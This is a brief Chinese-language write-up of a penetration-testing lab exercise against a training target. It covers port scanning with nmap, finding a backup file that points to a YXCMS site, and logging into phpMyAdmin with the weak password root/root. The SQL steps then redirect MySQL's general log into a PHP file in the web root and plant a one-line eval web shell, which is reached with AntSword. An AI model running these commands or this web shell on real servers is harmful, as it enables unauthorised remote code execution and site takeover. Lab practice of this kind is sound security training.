第二周渗透测试靶场实践
信息收集
扫描端口
- 靶场地址:10.203.87.175
- nmap -sS -sV -A 10.203.87.175
- 开了80端口,浏览器打开
- 发现备份文件,点击备份文件,解压
- 打开每个文件看看
- 有可能是网站中刚打开的YXCMS,回到网站,点击XYCMS
漏洞利用
phpMyadmin
- 通过弱口令root/root进入
- select @@basedir; //查询路径
- show global variables like ‘%general%’; //查看general*值
- general_log为OFF
- set global general_log=on; //开启日志
- 再次看一遍日志
- set global general_log_file=‘C:/phpstudy/www/llljy.php’; //设置日志存放文件
- select ‘<?php eval($_POST["nnn"]);?>’ //执行语句,会写入我们设置的llljy.php中
- 蚁剑连接